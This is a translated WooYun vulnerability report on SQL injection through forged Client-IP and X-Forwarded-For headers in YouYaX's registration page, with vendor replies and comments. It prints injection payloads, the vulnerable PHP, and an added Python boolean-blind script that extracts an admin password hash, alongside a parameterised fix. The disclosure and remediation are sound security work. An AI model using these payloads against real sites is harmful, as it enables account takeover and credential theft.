
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-062045

Title: SQL injection in YouYaX

Vendor: youyax.com

Author: 只发通用型

Submitted: 2014-05-27 10:36

Fixed: 2014-08-25 10:38

Published: 2014-08-25 10:38

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: fixed by the vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-05-27: Details sent to the vendor; awaiting vendor action
2014-05-27: Vendor confirmed; details visible to the vendor only
2014-07-21: Details disclosed to core white hats and domain experts
2014-07-31: Details disclosed to regular white hats
2014-08-10: Details disclosed to intern white hats
2014-08-25: Vendor fixed the vulnerability and chose to publish; details public

Brief description:

YouYaX is a conscientious vendor, so I'm here to farm a few bugs. This is the first one.

Detailed description:

In the file /ext/register.php, when $mix['is_prevent_reg'] is true:

if($mix['is_prevent_reg']){
    // Client-IP and X-Forwarded-For are plain request headers: whoever sends the request chooses them
    if (!empty($_SERVER['HTTP_CLIENT_IP']))
        $myIp = $_SERVER['HTTP_CLIENT_IP'];
    else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
        $myIp = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else
        $myIp = $_SERVER['REMOTE_ADDR'];
    // the untrusted value is concatenated into the query with no validation or escaping
    $sql = "select * from " . $config['db_prefix'] . "user where ip_addr='" . $myIp . "'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    // ... $num is then compared against $mix['prevent_reg_num']
}


Because the "IP" is taken from forgeable headers, it can be used for injection. The query result is never echoed, so a blind technique is the practical route: time-based, or boolean-based, since the "this IP has already registered too many times" refusal fires exactly when the row count reaches $mix['prevent_reg_num'] and therefore works as a true/false oracle. For the proof below the generated SQL statement is simply echoed.

[Screenshot: 1.jpg]
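As an added example (not code from the report or from YouYaX), the vulnerable check from register.php re-created in Python against an in-memory SQLite table standing in for the MySQL user table. The table prefix yx_, the limit value 3, the sample users and the stored hash are all constructed assumptions. It shows the header precedence, how a crafted X-Forwarded-For value rewrites the query (inflating the count so registration is refused, or zeroing it so the per-IP limit is bypassed, the effect the vendor noted), and, going one step beyond the report's time-based suggestion, a boolean-blind loop that reads a stored password hash one hex digit at a time using the refuse/allow message as its oracle. MySQL's SLEEP()-based timing is not simulated here.

```python
import sqlite3

PREFIX = "yx_"            # assumed stand-in for $config['db_prefix']
PREVENT_REG_NUM = 3       # assumed stand-in for $mix['prevent_reg_num']
ADMIN_HASH = "2ab96390c7dbe3439de74d0c9b0b1767"   # constructed MD5 hex digest for the sample admin row


def make_db():
    """Constructed sample data: in-memory SQLite stand-in for the MySQL user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PREFIX}user (user TEXT, pass TEXT, ip_addr TEXT)")
    conn.executemany(
        f"INSERT INTO {PREFIX}user VALUES (?, ?, ?)",
        [("admin", ADMIN_HASH, "10.0.0.1"),
         ("bob",   "0" * 32, "10.0.0.2"),
         ("carol", "1" * 32, "10.0.0.2"),
         ("dave",  "2" * 32, "10.0.0.2")],
    )
    return conn


def client_ip(headers, remote_addr):
    """Same precedence as register.php: Client-IP, then X-Forwarded-For, then REMOTE_ADDR.
    The first two are ordinary request headers, so the requester picks them."""
    return headers.get("Client-IP") or headers.get("X-Forwarded-For") or remote_addr


def vulnerable_ip_count(conn, headers, remote_addr="10.0.0.2"):
    """Mirrors the vulnerable PHP: the header value is concatenated straight into the SQL text."""
    ip = client_ip(headers, remote_addr)
    sql = f"select * from {PREFIX}user where ip_addr='{ip}'"
    return sql, len(conn.execute(sql).fetchall())


def registration_blocked(conn, headers, remote_addr="10.0.0.2"):
    """The only thing the requester observes: the 'IP used too many times' refusal when num >= limit."""
    _, num = vulnerable_ip_count(conn, headers, remote_addr)
    return num >= PREVENT_REG_NUM


def extract_hash(conn, username, length=32):
    """Boolean-blind extraction: a true subquery makes the OR match every row (refused),
    a false one matches none (allowed). SUBSTR exists in both MySQL and SQLite."""
    found = ""
    for pos in range(1, length + 1):
        for digit in "0123456789abcdef":
            payload = (f"' OR SUBSTR((SELECT pass FROM {PREFIX}user WHERE user='{username}'),"
                       f"{pos},1)='{digit}")
            if registration_blocked(conn, {"X-Forwarded-For": payload}):
                found += digit
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return found


if __name__ == "__main__":
    conn = make_db()
    print(vulnerable_ip_count(conn, {"X-Forwarded-For": "' OR '1'='1"})[0])
    print("refused from 10.0.0.2 honestly:", registration_blocked(conn, {}))
    print("limit bypassed:", registration_blocked(conn, {"X-Forwarded-For": "10.0.0.2' AND '1'='0"}))
    print("admin hash read via oracle:", extract_hash(conn, "admin"))
```

Each oracle query costs one registration attempt, so a 32-character hash takes at most 512 requests; against the real application the same loop would send the payload as the X-Forwarded-For header of a POST to /ext/register.php and key on the refusal alert.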

Proof of concept:

[Screenshot: 1.jpg]


To make reproduction easy for the administrator (this CMS also requires a mail server to be configured, so I commented that code out), I've pasted my modified copy of the file below; drop it in as-is to reproduce.

<?php
include('../ext_public/include.php');
include('../ext_public/database.php');
function doUserCount($param){
$count_arr = mysql_fetch_array(mysql_query("select * from " . $param . "count where id=1"));
$data=unserialize($count_arr['user_count']);
$date=date('w', time());
$date2=date('W',time());
if($date2 != $count_arr['week_order']){
mysql_query("update " . $param . "count set user_count='',post_count='',week_order='".$date2."' where id=1");
$count_arr = mysql_fetch_array(mysql_query("select * from " . $param . "count where id=1"));
$data=unserialize($count_arr['user_count']);
}
switch($date){
case 0:
@$data['g']++;
break;
case 1:
@$data['a']++;
break;
case 2:
@$data['b']++;
break;
case 3:
@$data['c']++;
break;
case 4:
@$data['d']++;
break;
case 5:
@$data['e']++;
break;
case 6:
@$data['f']++;
break;
}
mysql_query("update " . $param . "count set user_count='".serialize($data)."' where id=1");
}
if (isset($_POST['sub'])) {
if(empty($config['default_user_group'])||empty($config['not_log_in_user_group'])){
echo "<script>alert('请至后台[注册激活管理-配置]设置注册和未登陆默认用户组');</script>";
exit;
}
$user = htmlspecialchars(addslashes(trim($_POST['user'])), ENT_QUOTES, "UTF-8");
if(mb_strlen($user,'utf8')>7 || mb_strlen($user,'utf8')<2){
echo "<script>alert('用户名长度必须在2~7个字符之间');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
}
if (empty($_POST['pass'])) {
echo "<script>alert('密码必填');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
}
$pass = md5(addslashes($_POST['pass']));
$_POST['email']=addslashes($_POST['email']);
if (empty($_POST['email'])) {
echo "<script>alert('邮箱名必填');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
}
if($mix['is_prevent_reg']){
// Client-IP and X-Forwarded-For are request headers, so the "IP" below is attacker-controlled
if (!empty($_SERVER['HTTP_CLIENT_IP']))
$myIp = $_SERVER['HTTP_CLIENT_IP'];
else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
$myIp = $_SERVER['HTTP_X_FORWARDED_FOR'];
else
$myIp = $_SERVER['REMOTE_ADDR'];
// untrusted value concatenated straight into the SQL text
$sql = "select * from " . $config['db_prefix'] . "user where ip_addr='" . $myIp . "'";
$result = mysql_query($sql);
var_dump($sql); // added by the reporter only to show the generated query (proof of concept)
$num = mysql_num_rows($result);
if($num >= $mix['prevent_reg_num']){
echo "<script>alert('注册失败,此IP地址已经使用超过 ".$mix['prevent_reg_num']." 次了');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
}
}
$code = '';
for ($i = 0; $i < 6; $i++) {
$code .= mt_rand(0, 9);
}
if($config['register_mode']==1){
/* $mailconf = require("../Conf/mail.config.php");
if(empty($mailconf['mail_Host'])&&empty($mailconf['mail_Username'])&&empty($mailconf['mail_Password'])){
echo "<script>alert('管理员后台未配置邮件服务器');</script>";
exit;
}*/
}
mysql_query("SET NAMES 'utf8'");
mysql_query("SET sql_mode=''");
date_default_timezone_set('Asia/Shanghai');
$sql = "select * from " . $config['db_prefix'] . "user where user='" . $user . "'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
//判断是否被注册
if ($num > 0) {
echo "<script>alert('该用户名已被注册');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
} else {
$sql2 = "select * from " . $config['db_prefix'] . "user where email='" . $_POST['email'] . "'";
$result2 = mysql_query($sql2);
$num2 = mysql_num_rows($result2);
if ($num2 > 0) {
echo "<script>alert('邮箱名已被注册');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
} else {
if($config['register_mode']==1){
/* require_once("../ext_public/phpmailer/class.phpmailer.php");
$mail = new PHPMailer();
$mail->IsSMTP();
$mail->Host = $mailconf['mail_Host'];
$mail->SMTPAuth = true;
$mail->Username = $mailconf['mail_Username'];
$mail->Password = $mailconf['mail_Password'];
$mail->From = $mailconf['mail_From'];
$mail->FromName = $mailconf['mail_FromName'];
$mail->AddAddress($_POST['email']);
$mail->IsHTML(true);
$mail->CharSet = "UTF-8";
$mail->Encoding = "base64";
$mail->Subject = $mailconf['mail_Subject'];
$mail->Body = $mailconf['mail_Body'] . "<a href='" . url_site . "/ext/mail_active.php?user=" . $user . "&pass=" . $pass . "&email=" . $_POST['email'] . "&code=" . $code . "'>点此激活</a>";
if (!empty($_POST['email'])) {
exit;
}*/
if($mix['is_prevent_reg']){
$sql = "insert into " . $config['db_prefix'] . "user(user,pass,status,email,complete,face,time,fatieshu,bid,codes,ip_addr,user_group) values('" . $user . "','" . $pass . "',0,'" . $_POST['email'] . "','0','00.gif',now(),0,'".$mix['bid_init']."','" . $code . "','".$myIp."','".$config['default_user_group']."')";
}else{
$sql = "insert into " . $config['db_prefix'] . "user(user,pass,status,email,complete,face,time,fatieshu,bid,codes,user_group) values('" . $user . "','" . $pass . "',0,'" . $_POST['email'] . "','0','00.gif',now(),0,'".$mix['bid_init']."','" . $code . "','".$config['default_user_group']."')";
}
mysql_query($sql);
doUserCount($config['db_prefix']);
echo "<script>alert('注册成功,请至邮箱激活!');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
}else{
if(addslashes($_POST['valicode'])!=$_SESSION['verify']){
echo "<script>alert('输入的验证码不正确!');</script>";
exit;
}else{
if($mix['is_prevent_reg']){
$sql = "insert into " . $config['db_prefix'] . "user(user,pass,status,email,complete,face,time,fatieshu,bid,codes,ip_addr,user_group) values('" . $user . "','" . $pass . "',1,'" . $_POST['email'] . "','0','00.gif',now(),0,'".$mix['bid_init']."','". $code . "','".$myIp."','".$config['default_user_group']."')";
}else{
$sql = "insert into " . $config['db_prefix'] . "user(user,pass,status,email,complete,face,time,fatieshu,bid,codes,user_group) values('" . $user . "','" . $pass . "',1,'" . $_POST['email'] . "','0','00.gif',now(),0,'".$mix['bid_init']."','". $code . "','".$config['default_user_group']."')";
}
mysql_query($sql);
doUserCount($config['db_prefix']);
echo "<script>alert('注册成功!');</script>";
$_SESSION['youyax_data'] = 1;
$_SESSION['youyax_user'] = $user;
$_SESSION['youyax_bz'] = 1;
echo "<script>window.parent.location.href='" . url_site . "';</script>";
}
}
}
}
}
?>

Fix:

Validate $myIp before it is used (a regular expression, or filter_var($myIp, FILTER_VALIDATE_IP)), and, more fundamentally, never concatenate it into the query: escape it or bind it as a parameter. Note also that Client-IP and X-Forwarded-For are set by the client, so even a syntactically valid forged address still defeats the per-IP registration limit; rely on REMOTE_ADDR unless the request arrives from a proxy you control.
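The hardened form of the same check, as an added example that is not the project's code or the reporter's; it assumes the same constructed yx_ table and sample rows as above. It makes the three changes the fix calls for: the header is only honoured when the TCP peer is a trusted proxy, the value is validated as an IP literal with a strict parser (the role the proposed regex would play), and the query binds it as a parameter so it can never alter the SQL text.

```python
import ipaddress
import sqlite3

PREFIX = "yx_"   # assumed stand-in for $config['db_prefix']


def make_db():
    """Constructed sample data: in-memory SQLite stand-in for the MySQL user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PREFIX}user (user TEXT, ip_addr TEXT)")
    conn.executemany(f"INSERT INTO {PREFIX}user VALUES (?, ?)",
                     [("bob", "10.0.0.2"), ("carol", "10.0.0.2")])
    return conn


def resolve_client_ip(headers, remote_addr, trusted_proxies=()):
    """Honour X-Forwarded-For only when the TCP peer is a proxy we run; otherwise the peer
    address is the client. The rightmost XFF entry is the one our own proxy appended."""
    if remote_addr in trusted_proxies:
        xff = headers.get("X-Forwarded-For", "")
        if xff:
            return xff.split(",")[-1].strip()
    return remote_addr


def validate_ip(value):
    """The 'check the IP' step of the fix, done with a strict parser instead of a hand-written
    regex: returns the normalised address, or None for anything that is not an IPv4/IPv6 literal."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        return None


def hardened_ip_count(conn, headers, remote_addr, trusted_proxies=()):
    """Validated value, bound as a parameter: it can never become part of the query text."""
    ip = validate_ip(resolve_client_ip(headers, remote_addr, trusted_proxies))
    if ip is None:
        raise ValueError("client address is not a valid IP")
    row = conn.execute(f"select count(*) from {PREFIX}user where ip_addr=?", (ip,)).fetchone()
    return row[0]


if __name__ == "__main__":
    conn = make_db()
    # the injection payload from the report is now ignored (untrusted peer) ...
    print(hardened_ip_count(conn, {"X-Forwarded-For": "' OR '1'='1"}, "10.0.0.2"))
    # ... and rejected outright even when the peer is a trusted proxy
    try:
        hardened_ip_count(conn, {"X-Forwarded-For": "' OR '1'='1"}, "192.0.2.10", ("192.0.2.10",))
    except ValueError as exc:
        print("rejected:", exc)
```

In PHP the equivalents are filter_var($myIp, FILTER_VALIDATE_IP) for the validation and a prepared statement through mysqli or PDO for the binding; the mysql_* functions the file uses have no parameter binding (and were removed in PHP 7), so with that extension the minimum is mysql_real_escape_string() on the validated value.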

Copyright: please credit 只发通用型@乌云 when republishing.


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2014-05-27 12:19

Vendor reply:

It seems the registration limit can be bypassed. Thanks for the report.

Latest status:

2014-05-27: We publish vulnerabilities so that security can be tested properly while the program is still at an early stage, before a large user base has built up.


Comments:

  1. 2014-05-27 14:13 | 只发通用型 ( Intern white hat | Rank: 93 | Bugs: 14 | alt account for farming generic-type bounties )

    http://bbs.youyax.com/Content-index-id-5411.aspx

  2. 2014-05-27 14:26 | 疯狗 Certified white hat ( Intern white hat | Rank: 44 | Bugs: 2 | Having seen every vulnerability under heaven, the heart holds no code. )

    @只发通用型 A system still in its early stages; taking security seriously this early is a good start :P

  3. 2014-05-27 14:40 | YouYaX (WooYun vendor)

    @只发通用型 This really is a risk. Testing the database entry by entry this way could yield the admin account name, but it doesn't seem possible to get the password, since it is stored MD5-hashed in the admin table; even if all the MD5 hashes were obtained this way, MD5 is irreversible and can't be cracked when the password is complex.

  4. 2014-05-27 19:09 | 只发通用型 ( Intern white hat | Rank: 93 | Bugs: 14 | alt account for farming generic-type bounties )

    @YouYaX MD5 hashes can be looked up at http://www.cmd5.com/ ; if it isn't in their database they brute-force it for you. Your (plural) security awareness needs some work.

  5. 2014-05-27 21:47 | YouYaX (WooYun vendor)

    @只发通用型 There is no "们" (plural "you") here, there's only me.

  6. 2014-05-28 09:22 | 养乐多Ngan ( Regular white hat | Rank: 652 | Bugs: 72 | Hello, world. The biggest vulnerability is the human heart. )

    @YouYaX You're awesome! I have one of your (plural) bugs too, just haven't submitted it yet..

  7. 2014-05-28 09:22 | 养乐多Ngan ( Regular white hat | Rank: 652 | Bugs: 72 | Hello, world. The biggest vulnerability is the human heart. )

    @YouYaX Typo, I meant "your" (singular)...

  8. 2014-06-04 09:31 | neal ( Regular white hat | Rank: 219 | Bugs: 23 )

    @养乐多Ngan That's what you get for not submitting it, haha

  9. 2014-06-04 16:36 | 养乐多Ngan ( Regular white hat | Rank: 652 | Bugs: 72 | Hello, world. The biggest vulnerability is the human heart. )

    @neal No worries, it doesn't look like the same spot.